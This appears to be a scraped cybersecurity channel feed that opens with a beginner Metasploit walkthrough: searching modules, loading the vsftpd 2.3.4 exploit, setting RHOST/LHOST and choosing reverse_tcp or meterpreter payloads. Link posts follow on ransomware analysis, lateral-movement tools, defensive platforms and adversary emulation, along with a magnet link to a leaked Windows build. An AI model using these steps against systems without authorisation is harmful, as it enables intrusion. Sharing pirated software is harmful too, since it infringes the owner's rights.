Today we will have a look at Metasploit which is one of the best Exploitation framework owned by Rapid7 and is integrated with many exploits to completely destroy our target. Metasploit is written in Ruby Language and comes pre-packaged with many exploits, scanners, encoders which can perform different tasks. Metasploit has a large database which has more than 2000 exploits related to all the protocol versions and also related to Windows, Linux and much more.

Features:
1. It comes pre-packaged with Kali Linux and parrot OS .
2. It is constantly updated and new exploits are added to it in every 2 to 3 days.
3. It also has the capability to scan the target for open ports and also for vulnerabilities.They are called auxillary modules.
4. Whenever an interesting exploit is discovered it is soon added to the Metasploit Framework.
5. It also has an additional functionality called as meterpreter which is a kind of shell with very advance functionalities.
6. It can be used for both exploitation and post-exploitation.
7. It also include exploit related to Android devices and also related to voip and other attacks.
8. It also has capability to attack various IOT devices.
9. With msfvenom we can create a malacious payload which when executed cam be used to gain access to our target machine

Some Important Terms:

Exploit: It is a piece of code which triggers the vulnerability and successfully exploit it

Payload: It is the preice of code which is run after the exploit has successfully executed on the victim. The payload can be made to gain shell or to perform malacious tasks.


How to Use ?

To launch Metasploit you can type the command "msfconsole" on your terminal.

>>msfconsole

#Now we would see that the Metasploit has loaded and we are greeted with a banner

To change the banner we can use the banner command on the msf terminal.
msf> banner

To make the loading of Metasploit even faster we can start postgresql service.

>>service postgresql start

How to Use ?

1. search utility - search is used to search for strings such as
msf>search exploits - search for all the exploits
search MySQL - search for all exploit and auxillary with keyword MySQL .
search ftp - Search for all modules having word ftp

@ Like this we can search for exploits and auxillary modules related to our needs

2. Now when you have selected which exploit you want to use now we have to select that exploit . We can do that by 'use' command.
msf>use exploit/ftp/vsftpd2.3.4
This will load the specified exploit and you will notice that the exploit name is shown in red color.
This is a indication that the exploit was successfully loaded.

3. Now we have to set some options which we need to run the exploit. The options may include the RHOST, LHOST, LPORT and sometimes password or hashes or even wordlists.

LHOST = Local Host(your IP)
RHOST = Remote Host (victim IP)

show options = This will show you all the options you need to set to the exploit you just loaded for it to run properly.

Synatx to set Value: set <option> (value)

For example set LHOST 182.168.45.33
set LPORT 4444

Similarly we can set all the required options


4. Now we have set all the options so now it is time to set the payload which would be executed when our exploit code is successfully executed.

To see all the available payload type "show payloads "

Now we will see all supported payload with our supported exploit.

Use set payload <payload name> to set the payload .

Now Everything is done and we are Ready to run the exploit. Before that lets summerize:

1. Select a exploit
2. Show options
3. Set option
4. Show payload
5. Set payload
6. RUN !!

To run the exploit just type "run","exploit" and if your target would be vulnerable then our payload would get executed and the task of the payload would be performed.

Most common payload is
windows/shell/reverse_tcp
windows/meterpreter/reverse_tcp

The above 2 payload are used to get shell on your windows target if your exploit was successful.


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.25

Researchers uncover "distinctive" tactics, techniques and procedures (TTPs) used by Hades ransomware operators that set them apart from the rest of the pack, attributing it to a financially motivated threat group called GOLD WINTER.
https://thehackernews.com/2021/06/experts-shed-light-on-distinctive.html


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.25

A step by step of Darkside Malware Analysis
https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Whitepaper
"Smuggling Via Windows Services Display Name - Lateral Movement", 2021.

// This research paper explains how to take advantage of windows services, how to mimic display names to deploy malicious beacons or even Meterpreter sessions


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Red Team Tactics
Conduct Lateral Movement Attack By Leveraging Unfiltered Services Display Name To Smuggle Binaries As Chunks Into The Target Machine
https://github.com/lawrenceamer/TChopper

Threat Research
Mistune - iOS RCE vulnerabilities that have been hiding for a decade
https://blog.chichou.me/mistune

Malware analysis
1. Multi Perimeter Device Exploit Mirai Version Hunting
For Sonicwall, DLink, Cisco and more
https://isc.sans.edu/forums/diary/Multi+Perimeter+Device+Exploit+Mirai+Version+Hunting+For+Sonicwall+DLink+Cisco+and+more/27528
2. Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138

Analytics
Attribution of the ColunmTK Campaign against Air India
to APT41
https://blog.group-ib.com/colunmtk_apt41


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

امنيت در اينترنت 😁معنا ندارد حتي با استفاده از …


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Claroty CTD automatically identifies exact-match vulnerabilities in OT assets and creates context-rich tickets within SOAR solutions, enabling effective and efficient prioritization and remediation
https://claroty.com/security-orchestration-automation-response/


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

This is a comprehensive toolkit for establishing and developing Information Sharing and Analysis Centres, or ISACs. It includes activities, documents and tools, everything you need to set up and run an ISAC. The toolkit is divided into 4 different phases corresponding to the development of the ISAC. Each phase contains different topics for developing the organisation in that particular phase.
The topics have been classified into "New" for ISACs starting from scratch and "Established" for already established ISACs taking the next step in their maturity process. The ones concerning mainly new ISACs are marked with an "N" and the ones concerning established ISACs are marked with an "E
https://www.enisa.europa.eu/topics/national-cyber-security-strategies/information-sharing/isacs-toolkit/view


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

platform.
A threat intelligence platform for sharing, storing and correlating Indicators of Compromise of targeted attacks, threat intelligence, financial fraud information, vulnerability information or even counter-terrorism information. Discover how MISP is used today in multiple organisations. Not only to store, share, collaborate on cyber security indicators, malware analysis, but also to use the IoCs and information to detect and prevent attacks, frauds or threats against ICT infrastructures, organisations or people
https://www.misp-project.org/features.html


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Which 9 industries are most (and least) hardened against attack and why
Best practices for making the attackers’ jobs harder
The most common types of vulnerabilities per industry
How to be a Guardian of Trust for your business
Download the Report
The 2020 Trust Report
How different industries and sectors of the economy measure up when it comes to security preparedness
How to benchmark your industry against others using the Attacker Resistance Score Metric
Why organizations with a continuous approach to testing have up a 23% higher ARS metric than periodic testing
How industries are finding and closing vulnerabilities faster and reducing their remediation time by 73%
https://www.synack.com/
https://www.synack.com/trust-report/


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

https://www.malwarearchaeology.com/


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

This “Windows Sysmon Logging Cheat Sheet” is intended to help you understand where Microsoft’s FREE Sysinternals Sysmon agent can supplement and enhance your Windows Logging, NOT replace it. Sysmon can provide more information than standard default Windows logs provide. Sysmon is great to collect data you need for Incident Response, malware labs, high security situations, your own personal systems, or just improve the existing log data you are collecting with more details.
https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/5eb3687f39d69d48c403a42a/1588816000014/Windows+Sysmon+Logging+Cheat+Sheet_Jan_2020.pdf


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Security Company Names
اينم بيزينسي هست😁
The Cyber Security Company Names you choose will be front and center on business cards, websites, and advertisements. It will be everybody’s first impression of your business. By thoughtfully choosing a premium business name, you are giving your business the best chance at success
https://www.nameestate.com/business/cyber-security-company-names/


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

سود دهي استارت آپ هاي امنيت محور و ترنول مالي درخور
https://angel.co/cyber-security


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

CSIRT TOOLS KIT
Computer Security Incident Response Teams (CSIRTs) are responsible for receiving and reviewing incident reports, and responding to them as appropriate. These services are normally performed for a defined constituency such as a corporation, institution, educational or government network, region or country, or a paid client. CSIRT services generally fall into three categories - reactive (e.g vulnerability alerts, incident handling); proactive (e.g. intrusion detection, auditing and information dissemination); and security quality management (e.g. risk analysis, disaster recovery planning, and education and training)

Incident handling information
IntelMQ is a solution for CERTs for collecting and processing security feeds, pastebins, tweets and log files using a message queuing protocol.

Security Incident Response Platform
The Hive is a scalable, open source and free Security Incident Response Platform designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner.

Network forensics
NfSen allows you to keep all the convenient advantages of the command line using nfdump directly and gives you also a graphical overview over your netflow data.

Operational intelligence
Use Elastic to search, monitor, analyze and visualize machine data.

The Open Source Security Platform
Wazuh is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance.

Lightweight shipper for network data
Packetbeat is a lightweight network packet analyzer that sends data from your hosts and containers to Logstash or Elasticsearch.

Next tools in progress….
More tools will be added soon
https://csirt-kit.org/


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

The “SPEED” SIEM Use Case Framework
SimPle and EffectivE Detection

http://correlatedsecurity.com/content/images/2020/04/SPEED%20Use%20Case%20Framework%20v1.1.pdf


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Microsoft Windows 11 Leaked
Build 21996.1

Download
magnet:?xt=urn:btih:209922c98ec03a2cbf0eebe631f9c1d577795645&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

New research finds that ransomware attackers are increasingly shifting from using emails as an intrusion route to purchasing access from other cybercriminal enterprises that have already infiltrated major targets.
Read: https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Blue Team Techniques
1. Identify the attack paths in BloodHound breaking your AD tiering😁
https://github.com/improsec/ImproHound
2. Process Ghosting - New Executable Image Spoofing Attack
https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
]-> https://github.com/hasherezade/process_ghosting


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Mitre Att&ck Matrix

Community Threats

https://github.com/scythe-io/community-threats

https://github.com/threat-punter/community-contributions

https://github.com/MISP/MISP

https://github.com/MISP/threat-actor-intelligence-server

https://github.com/MISP/misp-galaxy

https://github.com/mitre/cti

https://gist.github.com/MSAdministrator/5d152ef57e4021c4ffa242aa02e0fb37

https://github.com/Azure/Azure-Sentinel

Tools and Plugin - Free and Commercial

https://github.com/guardicore/monkey

https://github.com/center-for-threat-informed-defense/caldera_pathfinder

https://github.com/mitre/emu

https://www.scythe.io/adversary-emulation

https://github.com/redcanaryco/invoke-atomicredteam

https://github.com/uber-common/metta

https://github.com/NextronSystems/APTSimulator

https://github.com/endgameinc/RTA

https://www.encripto.no/en/downloads-2/tools/

https://github.com/TryCatchHCF/DumpsterFire

https://github.com/jymcheong/AutoTTP

https://mitre.github.io/unfetter/

https://github.com/fugawi/mate

https://github.com/praetorian-inc/purple-team-attack-automation

https://github.com/splunk/attack_range

https://github.com/Telefonica/ATTPwn

https://github.com/mvelazc0/PurpleSharp

https://github.com/timfrazier1/AdversarySimulation

https://github.com/redhuntlabs/RedHunt-OS

https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI

https://github.com/SadProcessor/SomeStuff/blob/master/PoSh_ATTCK.ps1

https://github.com/OTRF/ATTACK-Python-Client

https://github.com/JimmyAstle/Atomic-Parser

https://www.cobaltstrike.com/

https://www.immunityinc.com/services/adversary-simulation.html

https://www.safebreach.com/SafeBreach-Labs-Presenting-New-Hacking-Techniques-and-Adversary-Simulation

https://simspace.com/products-components/

https://attackiq.com/platform/#how-firedrill-works

https://www.picussecurity.com/offensive-manager.html

https://docs.microsoft.com/pt-br/microsoft-365/security/office-365-security/attack-simulator?view=o365-worldwide

https://tearsecurity.com/index.html

https://www.xmcyber.com/why-haxm/

TTPs Creator

https://mitre-attack.github.io/attack-navigator

https://exploitpack.com/

https://www.metasploit.com/

https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.26

Analytics
#5G_Network_Security
AT&T Cybersecurity Insights Report:
"5G and the Journey to the Edge", 2021.


‎-آگاهي رساني امنيت سايبري-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.27